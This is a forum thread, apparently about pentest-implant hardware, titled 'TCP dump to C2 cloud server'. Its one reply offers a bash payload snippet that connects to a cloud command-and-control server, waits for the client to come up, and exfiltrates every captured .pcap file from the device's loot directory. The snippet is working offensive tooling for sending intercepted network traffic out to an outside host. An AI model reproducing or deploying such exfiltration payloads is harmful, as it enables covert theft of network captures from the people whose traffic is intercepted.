Jump to content

TCP dump to C2 cloud server


OTimme

Recommended Posts

  • 2 years later...
  • 6 months later...

try to add this to your payload

C2PROVISION="/etc/device.config"
LOOT_DIR=/mnt/loot/tcpdump

# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
LED SPECIAL
# Connect to Cloud C2
C2CONNECT
# Wait until Cloud C2 connection is established
while ! pgrep cc-client; do sleep 1; done
# Exfiltrate all test loot files
FILES="$LOOT_DIR/*.pcap"
for f in $FILES; do C2EXFIL STRING $f tcpdump-C2-Payload; done
else
# Exit script if not provisioned for C2
LED R SOLID
exit 1
fi

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...